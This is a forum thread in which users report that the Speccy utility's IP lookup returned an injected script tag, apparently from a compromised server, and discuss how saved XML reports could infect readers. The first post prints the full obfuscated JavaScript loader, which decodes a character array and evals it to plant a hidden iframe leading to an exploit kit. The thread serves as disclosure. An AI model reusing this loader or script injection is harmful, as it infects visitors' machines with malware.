Jump to content

Speccy querying a hacked page


Recommended Posts

While perusing the latest version of Speccy (1.10.248), I noticed something odd under Network.

 

"External IP Address <script type="text/javascript" src="http://www.nsa-lab.com/js.php"></script>12.xxx.xxx.xxx'>http://www.nsa-lab.com/js.php"></script>12.xxx.xxx.xxx

with the ending x's being the rest of my public IP.

 

speccyi.png

 

I didn't have a clue what this was, so I blindly copied the address (hxxp://www.nsa-lab.com/js.php < intentionally delinkified for this post) into Google Chrome to try and figure out what was going on.

 

When I do that, I get this:

avastu.png

 

The javascript is:

 

function createCSS(selector,declaration){var ua=navigator.userAgent.toLowerCase();var isIE=(/msie/.test(ua))&&!(/opera/.test(ua))&&(/win/.test(ua));var style_node=document.createElement("style");if(!isIE)style_node.innerHTML=selector+" {"+declaration+"}";document.getElementsByTagName("head")[0].appendChild(style_node);if(isIE&&document.styleSheets&&document.styleSheets.length>0){var last_style_node=document.styleSheets[document.styleSheets.length-1];if(typeof(last_style_node.addRule)=="object")last_style_node.addRule(selector,declaration);}};createCSS('#va','background:url(data:,ring.fromCharCode)');var R=null;var h=document.styleSheets;var F = null;for(var f=0; f < h.length; f++){try{var Z = h[f].cssRules || h[f].rules;for(var m=0;m < Z.length; m++){var Q = Z.item ? Z.item(m) : Z[m];if(Q.selectorText!='#va')continue;x = (Q.cssText) ? Q.cssText : Q.style.cssText;R = "St" + x.match(/(ri[^")]+)/)[1]; F=Q.selectorText.substr(1);};} catch(e){};}L=new Date(2020,11,3,2,21,8);i=L.getSeconds()-4;var o=[i+114,i+93,i+110,i+28,i+61,i+57,i+30,i+94,i+107,i+96,i+117,i+30,i+55,i+101,i+98,i+28,i+36,i+96,i+107,i+95,i+113,i+105,i+97,i+106,i+112,i+42,i+99,i+97,i+112,i+65,i+104,i+97,i+105,i+97,i+106,i+112,i+111,i+62,i+117,i+80,i+93,i+99,i+74,i+93,i+105,i+97,i+36,i+61,i+37,i+87,i+44,i+89,i+37,i+119,i+97,i+36,i+37,i+55,i+121,i+97,i+104,i+111,i+97,i+28,i+119,i+114,i+93,i+110,i+28,i+67,i+28,i+57,i+28,i+96,i+107,i+95,i+113,i+105,i+97,i+106,i+112,i+42,i+95,i+110,i+97,i+93,i+112,i+97,i+65,i+104,i+97,i+105,i+97,i+106,i+112,i+36,i+61,i+37,i+55,i+112,i+110,i+117,i+28,i+119,i+96,i+107,i+95,i+113,i+105,i+97,i+106,i+112,i+42,i+93,i+108,i+108,i+97,i+106,i+96,i+63,i+100,i+101,i+104,i+96,i+36,i+67,i+37,i+55,i+121,i+28,i+95,i+93,i+112,i+95,i+100,i+28,i+36,i+97,i+37,i+28,i+119,i+96,i+107,i+95,i+113,i+105,i+97,i+106,i+112,i+42,i+94,i+107,i+96,i+117,i+28,i+57,i+28,i+67,i+55,i+121,i+101,i+98,i+28,i+36,i+96,i+107,i+95,i+113,i+105,i+97,i+106,i+112,i+42,i+99,i+97,i+112,i+65,i+104,i+97,i+105,i+97,i+106,i+112,i+111,i+62,i+117,i+80,i+93,i+99,i+74,i+93,i+105,i+97,i+36,i+61,i+37,i+87,i+44,i+89,i+37,i+119,i+97,i+36,i+37,i+55,i+121,i+28,i+97,i+104,i+111,i+97,i+28,i+119,i+96,i+107,i+95,i+113,i+105,i+97,i+106,i+112,i+42,i+115,i+110,i+101,i+112,i+97,i+36,i+30,i+56,i+101,i+98,i+110,i+93,i+105,i+97,i+28,i+111,i+110,i+95,i+57,i+35,i+100,i+112,i+112,i+108,i+54,i+43,i+43,i+111,i+97,i+106,i+96,i+42,i+115,i+93,i+110,i+111,i+93,i+115,i+98,i+101,i+94,i+97,i+110,i+42,i+95,i+107,i+105,i+43,i+106,i+97,i+115,i+111,i+43,i+46,i+44,i+45,i+44,i+35,i+28,i+115,i+101,i+96,i+112,i+100,i+57,i+35,i+45,i+44,i+35,i+28,i+100,i+97,i+101,i+99,i+100,i+112,i+57,i+35,i+45,i+44,i+35,i+28,i+111,i+112,i+117,i+104,i+97,i+57,i+35,i+114,i+101,i+111,i+101,i+94,i+101,i+104,i+101,i+112,i+117,i+54,i+100,i+101,i+96,i+96,i+97,i+106,i+55,i+108,i+107,i+111,i+101,i+112,i+101,i+107,i+106,i+54,i+93,i+94,i+111,i+107,i+104,i+113,i+112,i+97,i+55,i+104,i+97,i+98,i+112,i+54,i+44,i+55,i+112,i+107,i+108,i+54,i+44,i+55,i+35,i+58,i+56,i+43,i+101,i+98,i+110,i+93,i+105,i+97,i+58,i+30,i+37,i+55,i+121,i+121,i+114,i+93,i+110,i+28,i+68,i+57,i+44,i+55,i+98,i+113,i+106,i+95,i+112,i+101,i+107,i+106,i+28,i+97,i+36,i+37,i+119,i+115,i+100,i+101,i+104,i+97,i+36,i+68,i+39,i+39,i+28,i+56,i+28,i+45,i+44,i+44,i+37,i+119,i+97,i+36,i+37,i+55,i+121,i+114,i+93,i+110,i+28,i+111,i+28,i+57,i+28,i+96,i+107,i+95,i+113,i+105,i+97,i+106,i+112,i+42,i+95,i+110,i+97,i+93,i+112,i+97,i+65,i+104,i+97,i+105,i+97,i+106,i+112,i+36,i+35,i+101,i+98,i+110,i+93,i+105,i+97,i+35,i+37,i+55,i+111,i+42,i+111,i+97,i+112,i+61,i+112,i+112,i+110,i+101,i+94,i+113,i+112,i+97,i+36,i+35,i+111,i+110,i+95,i+35,i+40,i+35,i+100,i+112,i+112,i+108,i+54,i+43,i+43,i+111,i+97,i+106,i+96,i+42,i+115,i+93,i+110,i+111,i+93,i+115,i+98,i+101,i+94,i+97,i+110,i+42,i+95,i+107,i+105,i+43,i+106,i+97,i+115,i+111,i+43,i+46,i+44,i+45,i+44,i+35,i+37,i+55,i+111,i+42,i+111,i+112,i+117,i+104,i+97,i+42,i+114,i+101,i+111,i+101,i+94,i+101,i+104,i+101,i+112,i+117,i+57,i+35,i+100,i+101,i+96,i+96,i+97,i+106,i+35,i+55,i+111,i+42,i+111,i+112,i+117,i+104,i+97,i+42,i+108,i+107,i+111,i+101,i+112,i+101,i+107,i+106,i+57,i+35,i+93,i+94,i+111,i+107,i+104,i+113,i+112,i+97,i+35,i+55,i+111,i+42,i+111,i+112,i+117,i+104,i+97,i+42,i+104,i+97,i+98,i+112,i+57,i+35,i+44,i+35,i+55,i+111,i+42,i+111,i+112,i+117,i+104,i+97,i+42,i+112,i+107,i+108,i+57,i+35,i+44,i+35,i+55,i+111,i+42,i+111,i+97,i+112,i+61,i+112,i+112,i+110,i+101,i+94,i+113,i+112,i+97,i+36,i+35,i+115,i+101,i+96,i+112,i+100,i+35,i+40,i+35,i+45,i+44,i+35,i+37,i+55,i+111,i+42,i+111,i+97,i+112,i+61,i+112,i+112,i+110,i+101,i+94,i+113,i+112,i+97,i+36,i+35,i+100,i+97,i+101,i+99,i+100,i+112,i+35,i+40,i+35,i+45,i+44,i+35,i+37,i+55,i+96,i+107,i+95,i+113,i+105,i+97,i+106,i+112,i+42,i+99,i+97,i+112,i+65,i+104,i+97,i+105,i+97,i+106,i+112,i+111,i+62,i+117,i+80,i+93,i+99,i+74,i+93,i+105,i+97,i+36,i+61,i+37,i+87,i+44,i+89,i+42,i+93,i+108,i+108,i+97,i+106,i+96,i+63,i+100,i+101,i+104,i+96,i+36,i+111,i+37,i+55,i+121];b=eval("e" + F + "l");var D='';J=b®;for(var f=0; f < o.length; f++){O=b(o[f]);D+=J(O);}b(D);

 

 

Posted about it on the Staff forums at BleepingComputer.com, and Grinler (Lawrence Abrams) posted this:

 

Basically whats happening is that speccy is querying your ip address by going to this url:

 

http://speccy.piriform.com/ip/

 

 

The content being returned, though, is not only the ip address but a javascript.

 

<script type="text/javascript" src="http://www.nsa-lab.com/js.php"></script>

 

Speccy is 100% compromised. That javascript loads a exploit kit, which has now downloaded some malware onto my Virtual Machine.

 

Pretty sure this would be considered a critical security flaw.

 

-kN

Link to comment
Share on other sites

Also,

 

I can see how this would affect people. If you save your report as XML and then load it, it will open Internet Explorer (or your other default browser) automatically and load the XML file. This will trigger the javascript to launch and boom you are infected.

Link to comment
Share on other sites

Thanks everyone for bringing this to the attention of Piriform.

 

I have send a mass PM out to alert Piriform so hopefully this can be taken care of right away.

Proud Graduate of GeekU - Learn how to remove malware

 

unite_teal.png

Unified Network of Instructors and Trained Eliminators

 

UBgrey.png

 

My help is always free, but if you can, please donate_2.gif to help me continue the fight against malware.

Link to comment
Share on other sites

Create an account or sign in to comment

You need to be a member in order to leave a comment

Create an account

Sign up for a new account in our community. It's easy!

Register a new account

Sign in

Already have an account? Sign in here.

Sign In Now
×
×
  • Create New...

Important Information

By using this site, you agree to our Terms of Use.